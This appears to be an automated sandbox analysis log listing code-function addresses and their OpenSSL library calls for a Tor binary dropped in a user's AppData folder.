Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0AA286 COMP_get_type,CRYPTO_mem_ctrl,CRYPTO_malloc,CRYPTO_THREAD_run_once,OPENSSL_sk_find,OPENSSL_sk_push,CRYPTO_mem_ctrl,CRYPTO_free,CRYPTO_mem_ctrl,ERR_put_error,ERR_put_error,CRYPTO_mem_ctrl,CRYPTO_free,CRYPTO_mem_ctrl,ERR_put_error,	25_2_6C0AA286
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E4297 HMAC_size,EVP_CIPHER_CTX_iv_length,HMAC_Update,HMAC_Final,CRYPTO_memcmp,EVP_CIPHER_CTX_iv_length,EVP_CIPHER_CTX_iv_length,CRYPTO_malloc,EVP_DecryptUpdate,EVP_DecryptFinal,CRYPTO_free,EVP_CIPHER_CTX_free,HMAC_CTX_free,EVP_sha256,HMAC_Init_ex,EVP_aes_256_cbc,EVP_DecryptInit_ex,	25_2_6C0E4297
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0DA2A0 CRYPTO_free,CRYPTO_strndup,CRYPTO_free,CRYPTO_memdup,OPENSSL_cleanse,__stack_chk_fail,	25_2_6C0DA2A0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0EA2B1 BN_clear_free,BN_clear_free,strlen,CRYPTO_clear_free,BN_clear_free,	25_2_6C0EA2B1
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A02C0 CRYPTO_clear_free,	25_2_6C0A02C0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D22D0 CRYPTO_malloc,CRYPTO_malloc,ERR_put_error,CRYPTO_free,CRYPTO_zalloc,ERR_put_error,CRYPTO_free,CRYPTO_free,ERR_put_error,	25_2_6C0D22D0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0B22F9 CRYPTO_memdup,CRYPTO_free,CRYPTO_free,ERR_put_error,	25_2_6C0B22F9
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0CC30C EVP_PKEY_CTX_free,CRYPTO_clear_free,EVP_MD_CTX_free,	25_2_6C0CC30C
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E0328 CRYPTO_free,CRYPTO_memdup,	25_2_6C0E0328
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D2321 CRYPTO_malloc,ERR_put_error,CRYPTO_free,	25_2_6C0D2321
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C6349 CRYPTO_free,CRYPTO_memdup,	25_2_6C0C6349
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0B234C CRYPTO_memdup,CRYPTO_free,	25_2_6C0B234C
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C096340 CRYPTO_malloc,CRYPTO_free,ERR_put_error,	25_2_6C096340
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0AA358 CRYPTO_free,CRYPTO_mem_ctrl,ERR_put_error,	25_2_6C0AA358
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0AE353 CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free,ERR_put_error,	25_2_6C0AE353
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0963AC CRYPTO_free,	25_2_6C0963AC
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0B23A7 CRYPTO_free,	25_2_6C0B23A7
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0923D3 CRYPTO_free,	25_2_6C0923D3
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C63E4 CRYPTO_free,CRYPTO_memdup,	25_2_6C0C63E4
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E03FC CRYPTO_memdup,	25_2_6C0E03FC
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0AA3F7 ERR_put_error,CRYPTO_mem_ctrl,	25_2_6C0AA3F7
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D9C21 EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,	25_2_6C0D9C21
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0CFC31 CRYPTO_free,	25_2_6C0CFC31
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C5C40 CRYPTO_realloc,	25_2_6C0C5C40
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C5C87 CRYPTO_realloc,	25_2_6C0C5C87
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BBC90 CRYPTO_THREAD_read_lock,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memset,__stack_chk_fail,memcpy,	25_2_6C0BBC90
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BFCB7 CRYPTO_free,	25_2_6C0BFCB7
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D3CCB CRYPTO_malloc,ERR_put_error,CRYPTO_free,	25_2_6C0D3CCB
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C09FCC5 EVP_MD_size,EVP_CIPHER_key_length,EVP_CIPHER_iv_length,CRYPTO_clear_free,CRYPTO_malloc,EVP_MD_CTX_new,EVP_MD_CTX_new,EVP_MD_CTX_set_flags,EVP_sha1,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_md5,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_DigestFinal_ex,EVP_MD_CTX_free,EVP_MD_CTX_free,OPENSSL_cleanse,__stack_chk_fail,	25_2_6C09FCC5
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C3CD7 CRYPTO_free,CRYPTO_malloc,memcpy,	25_2_6C0C3CD7
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E3CE0 EVP_CIPHER_CTX_free,HMAC_CTX_free,HMAC_CTX_new,EVP_CIPHER_CTX_new,HMAC_size,EVP_CIPHER_CTX_iv_length,HMAC_Update,HMAC_Final,CRYPTO_memcmp,EVP_CIPHER_CTX_iv_length,EVP_CIPHER_CTX_iv_length,CRYPTO_malloc,EVP_DecryptUpdate,EVP_DecryptFinal,CRYPTO_free,EVP_CIPHER_CTX_free,HMAC_CTX_free,EVP_CIPHER_CTX_free,HMAC_CTX_free,EVP_sha256,HMAC_Init_ex,EVP_aes_256_cbc,EVP_DecryptInit_ex,CRYPTO_free,__stack_chk_fail,CRYPTO_free,memcpy,ERR_clear_error,	25_2_6C0E3CE0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C09FD1B EVP_MD_size,EVP_CIPHER_key_length,EVP_CIPHER_iv_length,CRYPTO_clear_free,CRYPTO_malloc,EVP_MD_CTX_new,EVP_MD_CTX_new,EVP_MD_CTX_set_flags,EVP_sha1,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_md5,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,EVP_MD_CTX_free,	25_2_6C09FD1B
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A7D20 CRYPTO_zalloc,CRYPTO_free,ERR_put_error,	25_2_6C0A7D20
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D3D39 CRYPTO_free,CRYPTO_free,CRYPTO_free,	25_2_6C0D3D39
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E9D3B BN_copy,BN_copy,BN_copy,BN_copy,CRYPTO_free,CRYPTO_strdup,BN_dup,BN_dup,BN_dup,BN_dup,BN_free,BN_free,BN_free,BN_free,	25_2_6C0E9D3B
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BBD44 CRYPTO_THREAD_read_lock,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memset,	25_2_6C0BBD44
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0DFD59 OPENSSL_sk_push,X509_free,OPENSSL_sk_pop_free,CRYPTO_free,	25_2_6C0DFD59
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D9D51 EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,	25_2_6C0D9D51
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C7D66 memcpy,EVP_MD_size,time,CRYPTO_free,CRYPTO_strndup,CRYPTO_free,OPENSSL_cleanse,__stack_chk_fail,OPENSSL_cleanse,OPENSSL_cleanse,	25_2_6C0C7D66
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D1D95 CRYPTO_free,CRYPTO_free,__stack_chk_fail,	25_2_6C0D1D95
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C3DCC CRYPTO_malloc,memcpy,	25_2_6C0C3DCC
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0CDDE0 memcmp,CRYPTO_free,memcmp,memcmp,EVP_CIPHER_CTX_free,CRYPTO_free,memcmp,CRYPTO_free,CRYPTO_free,__stack_chk_fail,	25_2_6C0CDDE0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E3DE3 HMAC_CTX_new,EVP_CIPHER_CTX_new,HMAC_size,EVP_CIPHER_CTX_iv_length,HMAC_Update,HMAC_Final,CRYPTO_memcmp,EVP_CIPHER_CTX_iv_length,EVP_CIPHER_CTX_iv_length,CRYPTO_malloc,EVP_DecryptUpdate,EVP_DecryptFinal,CRYPTO_free,EVP_CIPHER_CTX_free,HMAC_CTX_free,	25_2_6C0E3DE3
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A3DE4 CRYPTO_clear_free,EVP_PKEY_CTX_free,	25_2_6C0A3DE4
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0DDDF7 CRYPTO_free,CRYPTO_free,	25_2_6C0DDDF7
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A7E03 CRYPTO_free,	25_2_6C0A7E03
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A3E07 CRYPTO_clear_free,EVP_PKEY_CTX_free,	25_2_6C0A3E07
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A5E10 OPENSSL_sk_num,X509_STORE_CTX_new,OPENSSL_sk_value,X509_STORE_CTX_init,X509_STORE_CTX_get0_param,X509_VERIFY_PARAM_set_auth_level,X509_STORE_CTX_set_flags,CRYPTO_THREAD_run_once,X509_STORE_CTX_set_ex_data,OPENSSL_sk_num,X509_STORE_CTX_set0_dane,X509_STORE_CTX_set_default,X509_VERIFY_PARAM_set1,X509_STORE_CTX_set_verify_cb,X509_STORE_CTX_get_error,OPENSSL_sk_pop_free,X509_STORE_CTX_get0_chain,X509_STORE_CTX_get1_chain,X509_VERIFY_PARAM_move_peername,X509_STORE_CTX_free,ERR_put_error,ERR_put_error,X509_STORE_CTX_free,X509_verify_cert,ERR_put_error,	25_2_6C0A5E10
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A7E11 CRYPTO_zalloc,CRYPTO_free,	25_2_6C0A7E11
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0DBE26 OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,	25_2_6C0DBE26
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A3E37 CRYPTO_clear_free,EVP_PKEY_CTX_free,	25_2_6C0A3E37
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A1E4B CRYPTO_free,strlen,CRYPTO_strdup,ERR_put_error,ERR_put_error,	25_2_6C0A1E4B
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BBE54 CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memset,	25_2_6C0BBE54
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0CBE68 OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_clear_free,CRYPTO_clear_free,	25_2_6C0CBE68
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A3E7B CRYPTO_clear_free,EVP_PKEY_CTX_free,	25_2_6C0A3E7B
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E9E93 CRYPTO_free,CRYPTO_strdup,BN_dup,	25_2_6C0E9E93
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E9EAB BN_copy,CRYPTO_free,CRYPTO_strdup,BN_dup,	25_2_6C0E9EAB
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C3EC6 CRYPTO_free,CRYPTO_malloc,__stack_chk_fail,CRYPTO_free,CRYPTO_malloc,memcpy,CRYPTO_memdup,memcmp,	25_2_6C0C3EC6
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E9EC3 BN_copy,BN_copy,CRYPTO_free,CRYPTO_strdup,BN_dup,	25_2_6C0E9EC3
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E9EDB BN_copy,BN_copy,BN_copy,CRYPTO_free,CRYPTO_strdup,BN_free,	25_2_6C0E9EDB
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C5EE2 strlen,memchr,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,CRYPTO_memcmp,	25_2_6C0C5EE2
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D1F19 CRYPTO_free,	25_2_6C0D1F19
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A1F32 ERR_put_error,CRYPTO_free,CRYPTO_strdup,	25_2_6C0A1F32
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E9F60 SRP_Verify_A_mod_N,SRP_Calc_u,SRP_Calc_server_key,BN_num_bits,CRYPTO_malloc,BN_bn2bin,BN_clear_free,BN_clear_free,	25_2_6C0E9F60
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C3F94 CRYPTO_free,CRYPTO_malloc,	25_2_6C0C3F94
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A1FA4 CRYPTO_free,CRYPTO_memdup,	25_2_6C0A1FA4
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C3819 CRYPTO_strdup,	25_2_6C0C3819
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C09D817 EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,CRYPTO_memcmp,	25_2_6C09D817
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E1829 CRYPTO_malloc,memcpy,memcmp,memcmp,memcmp,CRYPTO_clear_free,	25_2_6C0E1829
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C5837 CRYPTO_free,CRYPTO_free,	25_2_6C0C5837
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E5846 CRYPTO_free,	25_2_6C0E5846
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A9856 OPENSSL_sk_value,OPENSSL_sk_push,OPENSSL_sk_num,CRYPTO_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_set_cmp_func,OPENSSL_sk_sort,OPENSSL_sk_free,	25_2_6C0A9856
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0B5855 strlen,CRYPTO_free,CRYPTO_strdup,CRYPTO_free,ERR_put_error,	25_2_6C0B5855
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C091868 BIO_get_data,BIO_get_shutdown,CRYPTO_free,BIO_get_init,BIO_clear_flags,BIO_set_init,	25_2_6C091868
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BB860 CRYPTO_malloc,CRYPTO_THREAD_lock_new,CRYPTO_new_ex_data,X509_up_ref,X509_chain_up_ref,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_dup_ex_data,CRYPTO_strdup,CRYPTO_memdup,ERR_put_error,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_memdup,ERR_put_error,	25_2_6C0BB860
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D9879 EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,	25_2_6C0D9879
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0DB8AC OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,	25_2_6C0DB8AC
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C58C7 CRYPTO_realloc,	25_2_6C0C58C7
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0918C6 CRYPTO_free,BIO_get_init,BIO_clear_flags,BIO_set_init,	25_2_6C0918C6
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C38D7 CRYPTO_free,CRYPTO_malloc,memcpy,	25_2_6C0C38D7
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0DD8E8 CRYPTO_free,CRYPTO_free,	25_2_6C0DD8E8
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BF8E0 CRYPTO_zalloc,CRYPTO_free,__stack_chk_fail,	25_2_6C0BF8E0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A98F9 CRYPTO_free,CRYPTO_free,	25_2_6C0A98F9
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0958F0 CRYPTO_free,	25_2_6C0958F0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D993B EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,	25_2_6C0D993B
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C095930 CRYPTO_malloc,ERR_put_error,	25_2_6C095930
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0DB957 OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_num,OPENSSL_sk_value,	25_2_6C0DB957
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A9984 CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,OPENSSL_sk_new_null,CRYPTO_free,	25_2_6C0A9984
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D9983 EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,	25_2_6C0D9983
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C5998 CRYPTO_free,CRYPTO_free,	25_2_6C0C5998
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0959B0 CRYPTO_free,	25_2_6C0959B0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0919D3 BIO_get_data,BIO_get_shutdown,CRYPTO_free,CRYPTO_zalloc,BIO_set_init,BIO_set_data,BIO_clear_flags,BIO_get_data,BIO_set_shutdown,BIO_push,BIO_set_next,BIO_up_ref,BIO_set_init,BIO_get_init,BIO_clear_flags,BIO_set_init,ERR_put_error,	25_2_6C0919D3
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0959E0 CRYPTO_zalloc,ERR_put_error,	25_2_6C0959E0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D99E1 EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,	25_2_6C0D99E1
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C59F0 CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_realloc,CRYPTO_free,CRYPTO_free,CRYPTO_realloc,	25_2_6C0C59F0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0CFA11 CRYPTO_free,time,CRYPTO_free,CRYPTO_malloc,memcpy,	25_2_6C0CFA11
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A9A39 CRYPTO_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_set_cmp_func,OPENSSL_sk_sort,OPENSSL_sk_free,	25_2_6C0A9A39
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BDA30 CRYPTO_free,CRYPTO_memdup,	25_2_6C0BDA30
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E1A44 CRYPTO_clear_free,ERR_put_error,	25_2_6C0E1A44
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BFA58 CRYPTO_free,	25_2_6C0BFA58
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C095A50 CRYPTO_free,	25_2_6C095A50
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C09DA77 CRYPTO_malloc,	25_2_6C09DA77
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C5A87 CRYPTO_free,CRYPTO_free,	25_2_6C0C5A87
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0DFAA2 OPENSSL_sk_new_null,d2i_X509,OPENSSL_sk_push,X509_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_memcmp,OPENSSL_sk_num,X509_free,OPENSSL_sk_shift,OPENSSL_sk_pop_free,OPENSSL_sk_value,X509_get0_pubkey,CRYPTO_free,__stack_chk_fail,	25_2_6C0DFAA2
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A9AB1 CRYPTO_free,	25_2_6C0A9AB1
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C7AD1 CRYPTO_free,__stack_chk_fail,	25_2_6C0C7AD1
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0CFAE9 EVP_sha256,EVP_Digest,EVP_MD_size,CRYPTO_free,	25_2_6C0CFAE9
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C5B17 CRYPTO_realloc,	25_2_6C0C5B17
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0DBB16 OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,	25_2_6C0DBB16
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D3B2C CRYPTO_malloc,memcpy,CRYPTO_malloc,ERR_put_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_put_error,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,__stack_chk_fail,	25_2_6C0D3B2C
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D3B69 CRYPTO_malloc,memcpy,	25_2_6C0D3B69
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D9BA7 CRYPTO_free,	25_2_6C0D9BA7
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C7BB7 CRYPTO_free,	25_2_6C0C7BB7
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BFBB6 CRYPTO_zalloc,CRYPTO_free,	25_2_6C0BFBB6
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0ADBC0 CRYPTO_free,BUF_MEM_free,EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,COMP_CTX_free,COMP_CTX_free,EVP_MD_CTX_free,EVP_MD_CTX_free,EVP_MD_CTX_free,X509_free,X509_VERIFY_PARAM_move_peername,CRYPTO_free,ERR_put_error,ERR_put_error,	25_2_6C0ADBC0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A3BC0 EVP_PKEY_CTX_new,EVP_PKEY_derive_init,EVP_PKEY_derive_set_peer,EVP_PKEY_derive,CRYPTO_malloc,EVP_PKEY_derive,CRYPTO_clear_free,EVP_PKEY_CTX_free,__stack_chk_fail,	25_2_6C0A3BC0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C5BEC CRYPTO_free,CRYPTO_free,	25_2_6C0C5BEC
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BFBEC CRYPTO_free,	25_2_6C0BFBEC
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0AD420 X509_VERIFY_PARAM_free,CRYPTO_free,CRYPTO_free,CRYPTO_free_ex_data,OPENSSL_LH_free,X509_STORE_free,CTLOG_STORE_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_free,ENGINE_finish,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_secure_free,CRYPTO_THREAD_lock_free,CRYPTO_free,	25_2_6C0AD420
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C9430 EVP_PKEY_get1_tls_encodedpoint,CRYPTO_free,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,__stack_chk_fail,time,__stack_chk_fail,EVP_MD_CTX_new,EVP_PKEY_new_raw_private_key,EVP_sha256,EVP_DigestSignInit,EVP_DigestSign,EVP_MD_CTX_free,EVP_PKEY_free,	25_2_6C0C9430
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A148C CRYPTO_free,CRYPTO_memdup,	25_2_6C0A148C
